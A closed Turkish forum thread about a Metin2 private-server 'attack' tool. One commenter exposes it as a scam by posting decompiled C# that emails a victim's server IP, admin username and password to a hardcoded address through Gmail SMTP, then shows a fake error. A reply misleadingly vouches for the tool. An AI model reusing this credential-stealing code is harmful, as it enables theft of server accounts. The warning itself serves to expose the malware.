mavzermete 1
mavzermete
Bvural41 1
Bvural41
noisiv 1
noisiv
Manwe Work 1
Manwe Work
xranzei 1
xranzei
Hikaye Ekle

Metin2 Atack Server 2013

  • Konuyu başlatan Konuyu başlatan vegabond08
  • Başlangıç tarihi Başlangıç tarihi
  • Cevaplar Cevaplar 95
  • Görüntüleme Görüntüleme 5K
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

HERAKLES Otomatik Avlı kalıcı sunucu. 19 Haziran'da açılıyor. Atius & Wizard güvencesiyle hemen kayıt ol, ön kayıt ödülleri aktif. HEMEN TIKLA!

Arkadaşlar bu adam kaç aydır aynı konuyu açıp duruyor kesinlike yalandır isterseniz aynısını size vb.net te yazarım hiç bir şekilde baglantı kuramazsınız hiç uğraşmayın server şifreleriniz adama gidiyor.
 
İşinize yarıyacak tabi adam server nızı patlasında oturun aşağı. Program kodunu decompile ettim bakın ne varmış içinde:

C# Decompiled by DreamMaker

private void button1_Click(object sender, EventArgs e)
{
try
{
MailMessage mailMessage = new MailMessage();
mailMessage.From = new MailAddress("x0CReaTiVe0x@gmail.com", "x0CReaTiVe0x@gmail.com", Encoding.UTF8);
SmtpClient smtpClient = new SmtpClient();
mailMessage.To.Add("creative_34_@hotmail.com");
mailMessage.Subject = "Metin2 Admin Paneli Raporu !";
mailMessage.IsBodyHtml = false;
mailMessage.BodyEncoding = Encoding.UTF8;
mailMessage.Body = string.Concat(new string[]
{
"Sunucu İP : ",
this.textBox1.Text,
"\nKullanıcı Adı : ",
this.textBox2.Text,
"\nŞifre : ",
this.textBox3.Text,
"\nServer Sitesi : ",
this.textBox4.Text
});
mailMessage.Priority = MailPriority.High;
smtpClient.Credentials = new NetworkCredential("x0CReaTiVe0x@gmail.com", "vegabond");
smtpClient.Port = 587;
smtpClient.Host = "smtp.gmail.com";
smtpClient.EnableSsl = true;
smtpClient.Send(mailMessage);
MessageBox.Show("Sunucuya Bağlanırken Hata Oluştu !", "Hata!", MessageBoxButtons.OK, MessageBoxIcon.Asterisk);
this.textBox1.Clear();
this.textBox2.Clear();
this.textBox3.Clear();
this.textBox4.Clear();
}
 
Son düzenleme:
arkadaşlar milyonlarca kişi tarafından kullanılan ve virüs totalde test edilmiş bi programı yoksa üstteki yorumda yazan işe yaramaz keyloggeremi güvenceksiniz :D
 
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Şu an konuyu görüntüleyenler (Toplam : 0, Üye: 0, Misafir: 0)

Geri
Üst